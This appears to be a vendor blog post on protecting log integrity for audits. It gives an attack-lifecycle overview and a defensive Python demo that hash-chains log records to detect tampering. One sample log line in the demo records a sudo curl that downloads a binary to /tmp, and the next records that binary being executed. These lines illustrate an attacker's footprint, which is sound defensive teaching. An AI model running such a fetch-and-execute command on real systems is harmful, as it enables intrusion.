30 Days of IT Compliance Q&A: #12 – How Do You Protect Your Log Information?

Why the auditor is asking this question:

Let us walk through an example attack on a system to understand why log data needs to be protected and why an auditor may ask this question.

  1. Initial Compromise – this can be through exploiting a vulnerability or possibly social engineering. If logs are being collected, there is a good chance that the initial compromise will be recorded in them.
  2. Establish Presence – this is where the attacker ensures there is a foothold on the system, often using additional tools that are downloaded and executed on the system. The attacker will try to subvert various security defences in the network, collect credentials and potentially plant further malware. Again, log information will show the network flows and process execution on the system.
  3. Maintain Presence – the attacker may now be moving laterally through the network using stolen or cracked credentials, or exploiting further systems. This lateral movement can be seen in logs such as network traffic, process execution, device configuration changes and suspicious authentications.
  4. Exfiltration of Data – if the intent of the attacker is to exfiltrate data, this is the stage at which it would normally occur. Again, this could be detected through suspicious network traffic.
  5. Clean Up – so your data has been stolen; did the attacker leave evidence? There will be some clean-up going on: removing malware, installed software and any back doors, and typically the log entries that recorded them.

We have just described a potential attack. At many points there may have been suspicious activity that could have been detected through adequate log monitoring using a SIEM solution, but what if there was no monitoring in place? Without protecting the integrity of the logs there would be no verifiable evidence, and potentially no means of even understanding how the compromise occurred or how it can be stopped in the future.

It is often very difficult to verify the integrity of logs stored on the host system (if possible at all). The system may have been compromised and cannot be trusted.

The answer:

A proven method of ensuring your log integrity is to copy or send the logs to a log management system, preferably a SIEM. Your SIEM and log management technology should be treated as a highly sensitive asset and needs appropriate logical and physical security to provide integrity and assurance for the logs collected. A properly deployed and mature technology will certainly demonstrate in an audit that the log data is protected and forensically secure.
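The post says logs should be sent off the host to a collector that can vouch for them, but does not show what "verifiable" means in practice. The following is an added example, not AccelOps code and not from the original post: a host-side forwarder wraps each log line in a hash-chained record (each digest covers the previous digest, a sequence number and the line), and the collector checks the chain on receipt and keeps the last digest it saw. The sample log lines are constructed for the example and loosely follow the lifecycle above (a login, a tool download, process execution, a second login); the chain anchor `GENESIS`, the record layout and the function names are assumptions of this example, not a standard.

```python
import hashlib
import json
from typing import Dict, List, Tuple

# Constructed sample host log lines (syslog style), made up for this example
# and not captured from any real system.
SAMPLE_LOG_LINES: List[str] = [
    "Mar 10 09:12:01 host1 sshd[4021]: Accepted password for svc_backup from 10.0.5.23 port 51422 ssh2",
    "Mar 10 09:12:07 host1 sudo: svc_backup : COMMAND=/usr/bin/curl -o /tmp/agent http://10.0.5.99/agent",
    "Mar 10 09:12:09 host1 audit: EXECVE pid=4102 exe=/tmp/agent",
    "Mar 10 09:12:30 host1 sshd[4150]: Accepted publickey for svc_backup from 10.0.5.23 port 51430 ssh2",
]

# Chain anchor shared with the collector (assumption of this example). A real
# deployment would anchor on the last digest the collector acknowledged.
GENESIS = "0" * 64


def record_digest(prev_hash: str, seq: int, line: str) -> str:
    """SHA-256 over (previous digest, sequence number, line).

    Binding the previous digest into each record means any change to an
    earlier record changes every digest after it.
    """
    h = hashlib.sha256()
    h.update(prev_hash.encode("utf-8"))
    h.update(b"\n")
    h.update(str(seq).encode("utf-8"))
    h.update(b"\n")
    h.update(line.encode("utf-8"))
    return h.hexdigest()


def chain_records(lines: List[str], start_seq: int = 0,
                  prev_hash: str = GENESIS) -> List[Dict]:
    """Host-side forwarder: wrap each line in a chained record."""
    records = []
    for offset, line in enumerate(lines):
        seq = start_seq + offset
        digest = record_digest(prev_hash, seq, line)
        records.append({"seq": seq, "prev": prev_hash, "line": line, "hash": digest})
        prev_hash = digest
    return records


def verify_chain(records: List[Dict], expected_prev: str = GENESIS,
                 expected_seq: int = 0) -> Tuple[bool, str]:
    """Collector-side check: sequence numbers contiguous, each prev matches,
    each digest recomputes from the line. Returns (ok, reason)."""
    prev, seq = expected_prev, expected_seq
    for rec in records:
        if rec["seq"] != seq:
            return False, f"gap or reorder: got seq {rec['seq']}, expected {seq}"
        if rec["prev"] != prev:
            return False, f"chain break at seq {seq}"
        if record_digest(prev, seq, rec["line"]) != rec["hash"]:
            return False, f"record {seq} modified"
        prev, seq = rec["hash"], seq + 1
    return True, "ok"


def chain_head(records: List[Dict]) -> str:
    """Digest of the last record; the collector stores this after each batch."""
    return records[-1]["hash"] if records else GENESIS


def tamper_demo() -> Dict[str, Tuple[bool, str]]:
    """Ship the sample lines, then verify four host-side copies: intact,
    one record edited, one record deleted, and the tail truncated."""
    shipped = chain_records(SAMPLE_LOG_LINES)
    stored_head = chain_head(shipped)            # what the collector remembers

    edited = json.loads(json.dumps(shipped))     # deep copy, then alter one line
    edited[1]["line"] = edited[1]["line"].replace("curl", "cat")

    deleted = shipped[:2] + shipped[3:]          # record 2 removed

    truncated = shipped[:2]                      # last two records dropped
    trunc_ok, trunc_reason = verify_chain(truncated)
    if trunc_ok and chain_head(truncated) != stored_head:
        # A clean prefix passes the chain check; only the collector's stored
        # head reveals that the tail is missing.
        trunc_ok, trunc_reason = False, "tail truncated: head differs from collector's"

    return {
        "intact": verify_chain(shipped),
        "edited": verify_chain(edited),
        "deleted": verify_chain(deleted),
        "truncated": (trunc_ok, trunc_reason),
    }


if __name__ == "__main__":
    for name, (ok, reason) in tamper_demo().items():
        print(f"{name:10s} {'PASS' if ok else 'FAIL'}  {reason}")
```

Two points the demo makes that matter for the audit answer: edits and deletions inside the shipped range are caught by the chain alone, but a truncated tail only shows up because the collector remembered the last digest, which is why the collector's own state (and the SIEM holding it) has to be protected as carefully as the post says. The chain also only vouches for records that reached the collector before the host was compromised; anything the host emits afterwards can be forged along with its digests, so forwarding promptly over an authenticated channel is what gives the chain its value.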

Want to learn how AccelOps can help you protect your log information? Contact us; we’re here to help.

Authors

Marta Stone
